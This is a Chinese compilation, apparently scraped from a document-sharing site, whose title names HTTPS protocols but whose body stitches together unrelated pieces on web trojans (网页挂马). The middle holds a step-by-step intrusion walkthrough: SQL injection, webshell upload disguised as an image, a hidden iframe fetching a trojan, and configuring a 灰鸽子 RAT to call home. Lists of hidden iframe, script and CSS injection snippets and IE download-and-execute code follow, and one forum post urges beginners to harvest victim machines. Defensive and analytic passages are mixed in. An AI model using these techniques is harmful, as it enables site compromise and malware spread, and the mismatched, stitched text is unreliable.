下载文档原格式
HTTPS那些协议:TLS,SSL,SNI,ALPN,NPN1、肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。
2、木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。
有很多黑客就是热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。
3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。
4、挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。
5、后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。
这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。
通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor)6、rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDO WS下的system或者管理员权限)访问权限的工具。
通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。
然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,r ootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。
![网站常见三种漏洞攻击及防范方法[试题]](https://uimg.taocdn.com/d92db6eaf605cc1755270722192e453611665b40.webp)
国内外黑客组织或者个人为牟取利益窃取和篡改网络信息,已成为不争的事实,在不断给单位和个人造成经济损失的同时,我们也应该注意到这些威胁大多是基于Web网站发起的攻击,在给我们造成不可挽回的损失前,我们有必要给大家介绍几种常见的网站漏洞,以及这些漏洞的防范方法,目的是帮助广大网站管理者理清安全防范思绪,找到当前的防范重点,最大程度地避免或减少威胁带来的损失。
1、SQL语句漏洞也就是SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。
有效防范手段:对于SQL注入问题的一般处理方法是账户最小权限原则。
以下几种方法推荐使用:对用户输入信息进行必要检查对一些特殊字符进行转换或者过滤使用强数据类型限制用户输入的长度需要注意:这些检查要放在server运行,client提交的任何东西都是不可信的。
使用存储过程,如果一定要使用SQL语句,那么请用标准的方式组建SQL 语句。
比如可以利用parameters对象,避免用字符串直接拼SQL命令。
当SQL 运行出错时,不要把数据库返回的错误信息全部显示给用户,错误信息经常会透露一些数据库设计的细节。
2、网站挂马挂马就是在别人电脑里面(或是网站服务器)里植入木马程序,以盗取一些信息或者控制被挂马的电脑做一些不法的勾当(如攻击网站,传播病毒,删除资料等)。
网页挂马就是在网页的源代码中加入一些代码,利用漏洞实现自动下载木马到机器里。
网站挂马的形式可分为框架挂马、数据库挂马、后台挂马、服务器挂马以及其他形式的挂马方式。
有效防范手段:要防止网站被挂马,可以采取禁止写入和目录禁止执行的功能,这两项功能相组合,就可以有效地防止 ASP木马。
此外,网站管理员通过FTP上传某些数据,维护网页时,尽量不安装asp的上传程序。
挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。
挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。
<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。
通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。
除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。
2、利用网页跳转、弹出新窗口等方式进行挂马。
3、利用Flash等媒体封装的方式进行挂马。
4、在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。
挂马常见类型常见的几种类型如下:1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。
2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。
3、ARP挂马在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。
网页挂马之实战详解不论是那一种帮凶,黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将木马保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞,此方法当然就无效)。
一般而言黑客想要利用漏洞来进行黑客任务,几乎都必须自己写工具程序才行,不过在黑客的世界中永远有奉献出自己心力的慈善家,因此网络上就有一些针对某些漏洞而设计的木马生成器,让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务,在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。
由于这类工具是帮助真正的木马植入被黑电脑中与运行,因此应该称为木马帮凶,而不是真正的木马,因此严格来说它应该是木马帮凶生成器,而不是木马生成器,像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。
◎木马帮凶生成器的问题与盲区可能有读者会认为:既然有现成的工具,那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆,的确没错,虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地),但是有经验黑客并不会因此而高兴,因为这些木马帮凶生成器的问题很多,并非找到后下载就能顺利使用,主要有下列问题:.虽然在查找网站中有找到,但单击后该网页已经不见了,当然也就不可能下载木马帮凶生成器,这种情况很常见,只好再试下一个查找到的项目。
.有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的,就算下载后可以正常使用,但对于已修补该漏洞的电脑当然就无效,也就是说年代愈久,木马生成器愈没有利用的价值 (对许多电脑可能都无效),因此这类木马查找到一大堆也几乎是废物。
网页挂马调查报告网页被挂马是最让站长头痛的一件事情,因为这说明已经有骇客拥有了你的网站的操作权限,面对这种情况,首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具,彻底清除恶意代码和后门;而如果你拥有自己的主机,则应当积极检查程序是否有漏洞并立即升级到最新的补丁。
所以作为站长就应当最早的发现网页被挂马的代码,下面是一些比较常见的挂马方式:常见挂马方式这种挂马方式比较多,主要是以下这种格式:“<iframe src=木马地址 width=0 height=0></iframe>”,width=0和height=0是为了隐藏框架。
与Iframe挂马平级,也比较常见,主要是以下这种格式:"<script src=木马地址></script>",当然也可以演变为Iframe挂马,"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。
附上一张石头博客被Script挂马的截图只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
这种挂马方式与Script挂马差不多,惟一不同的就是使用了Encode隐藏了源JS的后缀,但同样可以达到执行代码的目的,主要是以下这种格式:“<script language='JScript.Encode' src=/a.txt></script>”虽然表面上看只是引用了一个txt文件,但是依然可以顺利执行其中的代码。
首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串 ...首先说什么是网马。
网马有什么用呢?先说下有什么用。
例如,大家想玩鸽子,想找肉鸡。
想找很多很多的肉鸡。
当然方法很多,例如135抓鸡什么的。
但是我想大家都遇到一个问题,看人家教程上,抓鸡一下子就来了一串一串的。
我自己操作为啥老半天就扫不到呢?因为这漏洞出来很久了,再者,天天有人扫肉鸡。
当然肉鸡就少了,也很难找到。
还有,大家扫描肉鸡的方法可能也有点不对。
综合起来,利用这些漏洞找肉鸡的效率很低下。
那么用网马呢,网马就是挂马。
你想下。
要是一个网站,一天有1万个人访问,一万个人中哪怕几率降低到%1的中马率。
一天也有100个人中马成为你的肉鸡啊。
而且,你挂上网马后关机睡觉肉鸡也刷刷刷的上来。
所以网马很爽,所以也比自己拿个软件扫描漏洞来劲。
上面说了网马的作用。
综合叙述下,就是快捷,方便。
更快,更高,更强的达到散播木马的途径。
然后,大家应该明什么是网马了吧?对的,网马简单的说下,就是网页木马。
当别人访问一个网页就可能从这个网页自动下载木马,并且在你后台悄悄运行。
这就是网马。
简单的这么理解,当然我们学黑客知识的肯定对这些东西不能简单理解了事了。
但是,我们只是入门的小菜鸟,所以再深入了解一点点就行了。
深入说下。
什么是网马?网马就是利用网页代码操作win的漏洞。
首先,我们得明白什么是网页。
为什么我们打开一个网站,这个网站会显示出这些图片。
就如你现在看的这篇帖子,为什么背景是这个颜色,为什么字体有大有小,为什么网页各处的颜色不同。
然后构成了这样一个网页。
怎么构成的?难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面?错了。
是图片+文字+代码。
这是一个网页构成的基本元素。
但是,代码是必须要的。
这里提到了代码。
例如一段网页由设计者设计,图片应该放这里,文字应该按照这样排列。
网页后门木马扫描系统的设计和实现的原理1 简介网页后门木马其实就是一段网页代码,主要以asp、jsp、php 代码为主。
由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。
并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常网站的页面中插入一段代码。
浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
2 网页后门木马的类型2.1 框架嵌入式网页挂马网页木马被攻击者利用iframe 语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术[1]。
通常的挂马代码“<iframe src='实际木马地址' width=0height=0></iframe>”,用户访问该页面时会自动跳转到实际木马页面运行木马程序。
2.2 js 调用型网页挂马此类网页挂马是一种利用javascript 脚本文件调用的原理进行的网页木马挂马技术,比如将代码“document.write("<iframe width='0' height='0'src='实际木马地址'></iframe>");”保存为a.js,则js 调用型网页挂马代码为“<script language=javascript src=a.js></script>”,用户访问该页面时会调用a.js 运行远程木马。
2.3 图片伪装型网页挂马攻击者利用图片作为转移网页访问者视线的一种方式,将代码插入目标网站内页或另存为HTML 再上传到目标网站,当用户访问该网页时,就会中招[2]。
以上只是列出了三种最常见的网页挂马方式[3],但随着时间的推移,这些挂马方式将会演变成各种各样的形态,旨在盗取不同的机密或链接恶意木马页面。
网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上,“网页挂马”是一个出现频率很高的词汇。
关于某些网站被挂马导致大量浏览用户受到攻击,甚至造成财产损失的新闻屡见不鲜。
而这些挂马事件总能和一些软件漏洞联系起来。
那么,什么是网页挂马?网页挂马和软件漏洞有什么联系?它的危害在什么地方,又该如何防御呢?本文结合攻防研究中的经验体会,将就这些问题进行探讨。
网页挂马简介什么是网页挂马要解释什么是网页挂马,要先从木马说起。
大家知道,木马是一类恶意程序,和其它的正常文件一样存在于计算机系统中。
这些恶意程序一旦运行,会连接到远处的控制端,使其享有恶意程序所在系统的大部分操作权限,例如给计算机增删密码,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等各种有害操作,而这些操作往往不被使用者察觉。
将木马与网页结合起来成为网页木马,表面看似正常的网页,当浏览者浏览该网页的同时也运行了木马程序。
网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞,自动下载已经放置在远端的恶意程序。
由于下载过程利用了软件上的漏洞,是非正常途径,不会被计算机系统或浏览器本身所察觉。
网页挂马指的是攻击者篡改了正常的网页,向网页中插入一段代码,当用户浏览网页的同时执行这段代码,将引导用户去浏览放置好的网页木马。
使用一些特别的技术可以使得这段代码的执行对用户来说不可见。
网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞,只要这些漏洞能够被利用并执行任意代码,那么存在漏洞的系统就有可能受到网页木马攻击。
网页挂马的技术门槛并不高,互联网上可以得到很多现成的攻击工具。
同时网页木马隐蔽性高,挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行,用户都无法察觉。
网页挂马的传播范围同被挂马网页的数量和浏览量成正比。
各种类型的网站都可以成为网页挂马的对象。
上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。
第一章计算机病毒概述1、什么是计算机病毒?计算机病毒包括哪几类程序?答编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。
具有破坏性,复制性和传染性。
(一)文件类病毒。
该病毒在操作系统执行文件时取得控制权并把自己依附在可执行文件上,然后利用这些指令来调用附在文件中某处的病毒代码。
当文件执行时,病毒会调出自己的代码来执行,接着又返回到正常的执行序列。
通常,这些病毒发作迅速且隐蔽性强,以至于用户并不知道病毒代码已被执行。
(二)引导扇区病毒。
它会潜伏在硬盘的引导扇区或主引导记录中。
触发引导区病毒的典型事件是系统日期和时间被篡改。
(三)多裂变病毒。
多裂变病毒是文件和引导扇区病毒的混合,它能感染可执行文件,从而能在网上迅速传播蔓延。
(四)隐蔽病毒。
这种病毒通过挂接中断修改和隐藏真面目,具有很大的欺骗性。
因此,当某系统函数被调用时,这些病毒便“伪造”结果,使一切看起来正常。
秘密病毒摧毁文件的方式是伪造文件大小和日期,隐藏对引导区的修改,而且使大多数操作重定向。
(五)异形病毒。
这是一种能变异的病毒,随着感染时间的不同,改变其不同的形式。
不同的感染操作会使病毒在文件中以不同的方式出现,使传统的模式匹配法失效。
(六)宏病毒。
宏病毒不只是感染可执行文件,还可感染一般应用软件程序。
它会影响系统的性能以及用户的工作效率。
宏病毒是利用宏语言编写的,不面向操作系统,所以它不受操作平台的约束,可以在DOS、Win-dows,Unix、Mac甚至在0S/2系统中传播。
宏病毒能被传到任何可运行编写宏病毒应用程序的机器中。
现在随着E-mail、WWW等强大的互联能力及宏语言的进一步强化,极大地增强了它的传播力。
2 、计算机病毒的发展可以大致划分为几个过程?每个过程的特点?答在病毒的发展史上,病毒的出现是有规律的,一般情况下一种新的病毒技术出现后,病毒迅速发展,接着反病毒技术的发展会抑制其流传。
网站挂马1,扫描准备入侵的网站·寻找注射点·使用的工具NBSI3.02,进入后台后,找一个可以上传文件的地方·比如说添加新闻·任何动态网站都会有添加新闻的功能的·3,上传小马abc.asp 一般的网站都会不允许直接上传.asp格式的文件,但允许上传.gif等图片的格式,因此先将abc.asp改为abc.gif,, 上传··然后检测一下是否上传成功4.这里表示小马已经上传成功了··然后我们通过修改备份数据库··来将Abc.gif改为.asp后缀格式的注意当前数据库路径前面两个点不能掉~!『确定』5.数据库备份成功~!然后通过浏览器访问如下URL/admin/Databackup/fuck.aspfuck.asp 是自己开始定义的名字·我们打开如下小马界面:6.接下来我们上传大马:上传成功后,在浏览器中访问大马7.这样我们就得到了WEBSHELL 了~~!接下来我们可以通过功能8FSO文件浏览操作器到主页上写入一句话木马,,给自己留个后门,或者直接在网页上写入一个网页跳转·<iframe src=/wm.exe width=0 height=0></iframe>这句话的意思就是,当有人访问我们准备入侵的网站的网页时(如:),它会自动打开一个我自己另外一个网站,上面的我绑定了木马的网页:wm.exe在这里我们可以通过MS06014这个IE漏洞利用程序讲我们的木马和网页绑定这里的muma.exe可以是直接绑定的木马也可以绑定的‘下载者’程序,他们之间的区别就在于,如果是直接绑定的木马,当用于访问被挂马的网站时,同时打开我的网页,由于我设置的高和宽都为0 ,所以我们肉眼看不见而已,开车我们网页后他就直接下载我们的木马··如果木马体积比较大的话,很容易造成浏览器假死的现象,因此这里可以将‘下载者’这个程序和我的网页绑定,这样,当用户访问被入侵的网站时,它会自动将体积很小的下载者下下来·然后自动运行··然后下载者的功能就是去下载我们真正的木马~!这样,不但不会造成浏览器的假死··还可以穿透防火墙,8.这里的木马我们可以配置一个鸽子,加免杀配置鸽子:1.首先架设一个FTP服务器和WEB服务器,或者你可以用公网的申请一个免费的空间这里表示我已经架设好了WEB和FTP服务器了··我的WEB,FTP服务器地址为192.168.200.3网站为我挂马的WEB服务器地址为192.168.200.2网站为2配置鸽子的自动上线··如下下面IP文件内容的地址我写错了··应该就是运行我鸽子主程序的地址192.168.200.1 这是我本机(真实机)2.接下来配置服务程序这里的通知地址我写的我的网站域名,因为真实的环境IP是变动的,但域名不会变,因此我们可以搞一个花生壳动态域名绑定·这样我们就不用再担心IP变动的这个情况了~!一般在公网上挂马也就是写的自己的空间域名地址~!9.这样我们的鸽子的服务端就已经生成了···然后再按文章开头前面的方法··将鸽子挂到网上去~~!整个的一个思路是,访问被挂马的网站自动从我的空间上下载用户――――――――下载者――――――――――木马(鸽子)实验成功了,,如下。
网马解密大讲堂——网马解密初级篇作者: networkedition复制内容到剪贴板一. 网页挂马的概念:网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险操作。
复制内容到剪贴板二.常见的网页挂马方式:框架挂马:<iframe src=/muma.htm width=0 height=0></iframe>2. js文件挂马:首先将以下代码:document.write("<iframe width=0 height=0 src='地址'></iframe>");保存为xxx.js,则JS挂马代码为:<script language=javascript src=xxx.js></script>3. js变形加密<SCRIPT language="JScript.Encode"src=/muma.txt></script>muma.txt可改成任意后缀4. flash木马http://网页木马地址插入木马地址 width=10 height=10", "GET" 宽度和高度,方式后面的照添,更改木马地址就可以了。
5. 不点出现链接的木马<a href="(迷惑的超级连接地址,显示这个地址指向木马地址)" >页面要显示的内容 </a><SCRIPT Language="JavaScript">function www_163_com (){var url="你的木马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}</SCRIPT>复制内容到剪贴板6.隐蔽挂马:top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="/muma.htm/"></iframe>'[/url]7.css中挂马:body {background-image:url('javascript:document.write("<script src=/muma.js></script>")')}8.Java挂马:<SCRIPT language=javascript>window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");9.图片伪装:<html><iframe src="网马地址" height=0 width=0></iframe><img src="图片地址"></center></html>10. 伪装调用:<frameset rows="444,0" cols="*"><frame src="打开网页" framborder="no" scrolling="auto" noresizemarginwidth="0"margingheight="0"><frame src="网马地址" frameborder="no" scrolling="no" noresizemarginwidth="0"margingheight="0">11.高级欺骗:<a href="(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容</a><SCRIPT Language="JavaScript">function www_163_com (){var url="网马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=n o,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}</SCRIPT>三.常见网马所利用的漏洞判断方式:1. 根据恶意网址名称来判断漏洞:2.根据CLSID判断漏洞:常见网马解密工具:1.Freshow工具(作者:jimmyleo大牛)工具简介(摘自freshow帮助文档):Freshow是一款脚本解密的工具,其开发的初衷是减少机械操作和简化处理步骤,使您能专注于脚本本身。
挂马的常用方式包括:
1. 通过木马程序实现:黑客通常会通过各种途径传播木马程序,例如电子邮件、聊天软件、恶意网站等。
一旦用户下载并运行这些木马程序,黑客就可以远程控制用户的电脑,从而实现挂马的目的。
2. 利用系统漏洞进行攻击:黑客会利用系统漏洞对网站进行攻击,从而实现挂马。
例如,利用 SQL 注入漏洞、跨站脚本攻击(XSS)等方式,黑客可以将木马程序植入到网站中,对用户造成威胁。
请注意,这些信息可能会违反法律法规,挂马行为会严重危害网络安全,导致个人信息泄露、计算机系统损坏等严重后果。
因此,我们应该遵守法律法规,保护网络安全,不参与任何非法行为。
网站木马的原理
关于网站木马的原理
网页木马就是表面上伪装成正常网页或者在网页中插入代码,当用户访问时,网页木马就会利用系统或浏览器漏洞将配置好的.木马服务端进行自动下载并执行。
网页挂马就是利用漏洞向用户传播木马下载器,通过将一个木马程序上传到网站里,然后通过木马下载器下载网页木马,并上传到空间里面,修改代码,从而在用户访问网页时执行。
网页挂马常用方式:
1、将网页木马伪装成页面元素,木马则会被浏览器自动下载到本地。
2、利用脚本运行木马下载器
3、将木马伪装成缺失组件,或和缺失组件进行捆绑(flash播放插件)。
木马的存在形态有如下几种:
1、框架挂马
2、js文件挂马
3、body挂马
4、css中挂马
5、图片伪装。
国内资深安全专家详谈网页木马诚信网安--子明【 专家特稿】当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播。
一、什么是网页木马网页木马是利用网页来进行破坏的病毒,它包含在恶意网页之中,使用脚本语言编写恶意代码,依靠系统的漏洞,如IE浏览器存在的漏洞来实现病毒的传播。
当用户登陆了包含网页病毒的恶意网站时,网页木马便被激活,受影响的系统一旦感染网页病毒,就会遭到破坏,轻则浏览器首页被修改,标题改变,系统自动弹出广告,重则被装上木马,感染病毒,使用户无法进行正常的使用。
甚至会引起系统崩溃,敏感信息丢失等严重后果。
由于脚本语言易于掌握,所以网页木马非常容易编写和修改,造成很难提取特征值,增加了杀毒软件查杀以及用户预防的困难。
目前的网页木马都是利用脚本语言、ActiveX、WSH等来实现对客户端计算机的远程操作,如改写注册表,添加、删除、更改文件夹等操作。
网页病毒可以以此来达到传播的目的。
1.利用WSH(Windows Scripting Host Object R eference)等系统控件WSH,是“Windows Scripting Host”的简称,可以直译为“Windows 脚本宿主”。
在Windows系统中会默认安装,它是内嵌于Windows 操作系统中的脚本语言工作环境。
Windows Scripting Host 这个概念最早出现于 Windows 98 操作系统。
微软在研发 Windows 98 时,为了实现多类脚本文件在Windows 界面或Dos 命令提示符下的直接运行,就在系统内植入了一个基于32 位Windows 平台、并独立于语言的脚本运行环境,并将其命名为“Windows Scripting Host”。
WSH 架构于ActiveX 之上,通过充当 ActiveX 的脚本引擎控制器,WSH 为 Windows 用户充分利用威力强大的脚本指令语言扫清了障碍。
WSH也有它的不足之处,任何事物都有两面性,WSH 也不例外。
WSH 的优点在于它使用户可以充分利用脚本来实现计算机工作的自动化;但也正是它的这一特点,使系统存在了安全隐患。
计算机病毒制造者用脚本语言来编制病毒,并利用WSH 的支持功能,让这些隐藏着病毒的脚本在网络中广为传播。
借助WSH的缺陷,通过JAVAScript,VBScript,ActiveX等网页脚本语言,可以改动受影响系统的注册表,利用服务器端脚本程序如:ASP,PHP等来记录访问网页者的相关信息,浏览之后,系统目录被完全共享;IP地址、访问时间、操作系统名称会被网页木马所记录,造成敏感信息的泄露。
2.Microsoft Internet Explorer等浏览器存在漏洞3.脚本语言用JAVA编制的脚本语言主要是Java Applet和Java Script。
Applet是Java编写的小应用程序,不能独立运行,需要嵌入HTML文件,遵循标准,在支持Java的浏览器(如Microsoft Internet Explorer) 上运行,是Java一个重要的应用分支,它改变了传统网页呆板的界面,在WWW网页(Home Page / Pages)设计中加入了动画、影像、音乐等元素。
JavaScript是一种基于对象(Object)和事件驱动(Event Driven)并具有安全性能的脚本语言。
使用它的目的是与HTML超文本标记语言、与Web客户交互作用。
从而可以开发客户端的应用程序等。
它是通过嵌入或文件引用在标准的HTML语言中实现的。
它的出现弥补了HTML语言的缺陷,它是Java与HTML折衷的选择,具有基于对象、简单、安全、动态、跨平台性等特性。
ActiveX是Microsoft提出的一组使用COM(Component Object Model,部件对象模型)使得软件部件在网络环境中进行交互的技术。
它与具体的编程语言无关。
作为针对Internet应用开发的技术,ActiveX 被广泛应用于WEB服务器以及客户端的各个方面。
同时,ActiveX技术也被用于方便地创建普通的桌面应用程序。
在Applet中可以使用 ActiveX技术,如直接嵌入ActiveX控制,或者以ActiveX技术为桥梁,将其它开发商提供的多种语言的程序对象集成到Java中。
与Java的字节码技术相比,ActiveX提供了“代码签名”(Code Signing)技术保证其安全性。
造成网页病毒传播和形成的主要原因,是因为Windows操作系统以及Microsoft Internet Explorer等浏览器存在漏洞。
二、网页木马的攻击原理网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
打开一个网页,IE浏览器不会自动下载程序和运行程序,这是因为,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面列举一些IE浏览器等存在的漏洞来分别说明为什么利用网页木马可以下载程序和运行程序。
1.下载可执行文件.index里有一个代码漏洞<LINK href="ray.exe" rel=stylesheet type=text/css>,IE会把可执行文件误认为CSS样式表而下载到IE的临时文件目录.也可以利用<SCRIPT LANGUAGE="icyfoxlovelace" src="/1.exe"></SCRIPT>这段代码,把这段代码插入到网页源代码的</BODY>…</BODY>之间,运行后就会发现在IE的临时目录Temporary Internet Files下,已经下载了1.exe这个病毒文件。
2.自动运行程序<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=newActiveXObject("shell.application");space("c:\\Windows\\").items().i t em("Notepad.exe").invokeverb(); </SCRIPT>把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE打开该网页,这段代码可以在IE中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,就可以用它自动运行本地电脑上的任意程序。
通过以上的例子可以看出,利用IE的漏洞,在网页中插入相关的代码,IE完全可以自动下载和运行程序。
三、可能被网页木马利用的漏洞1.利用URL格式漏洞此类网页木马是利用URL格式漏洞来欺骗用户。
构造一个看似JPG格式的文件诱惑用户下载,但事实上用户下载的却是一个EXE文件。
此类攻击,具有相当的隐蔽性,利用URL欺骗的方法有很多种,比如起个具有诱惑性的网站名称或使用易混的字母数字掉包进行银行网络钓鱼,还有漏洞百出的“%30%50”之类的Unicode编码等等,现在列举比较常见的几种方法:(1).@标志过滤用户名的解析本来@标志是E-mail地址的用户名与主机的分隔符,但在URL中同样适用,而且功能如出一辙。
HTTP (超文本传输协议)规定了URL的完整格式是“Http://Name:Password@IP地址或主机名”,其中的“IP地址或主机名”是必填项。
@标志与其前面的“Name:Password”,意为“用户名:密码”,属于可选项。
也就是说,在URL中真正起解析作用的网址是从@标志后面开始的,这就是欺骗原理。
比如用户访问“@/Hui GeZi_Server.exe”,从表面上看,这是新浪网提供的一个链接,用户会认为这是一个无害的链接,而点击,而实际上“”只是个写成新浪网址形式的用户名(此处的密码为空),因为后面有@标志。
而真正链接的网址却是“/HuiGeZi_Server.exe” 也就是说这个发来的URL地址其实完全等同于“Http://www /HuiGeZi_Server.exe,而与前面的用户名毫无关系,只是迷惑性可就大大提高了。
即使没有这个用户名,也完全不影响浏览器对URL的解析。
(2).十进制的IP地址常见的IP地址包括四个字节,一般表示形式为“xxx.xxx.xxx.xxx”(x表示一个十进制数码),例如“61.135.132.12”。
因为数字IP地址较长,且过于抽象、难以记忆,所以采用域名服务DNS来与之对应。
在浏览器地址栏中输入“”与“Http://61.135.132.12”的结果完全一样,都是访问搜狐网站,因为61.135.132.12就是搜狐域名的IP地址。
不过,用Http://1032291340访问的话,仍然可以打开搜狐网站,这是因为,四位点分十进制形式的IP地址“61.135.132.12”代表一组32位二进制数码,如果合在一起再转换成一个十进制数的话,答案就是1032291340。
转换方法,就是数制的按权展开:12×2560+132×2561+135×2562+61×2563=12+33792+8847360+1023410176=1032291340(基数为256,即28)。
在上文的例子中提到了“/HuiGeZi_Server.exe”。
这种字母域名有时还能被用户识破,而在把它对应的IP地址(假设为“61.135.132.13”)换算成一个十进制数后,结果是1032291341,再结合@标志过滤用户的解析,就会变成@1032291341这样的地址,这样就更加隐蔽了。
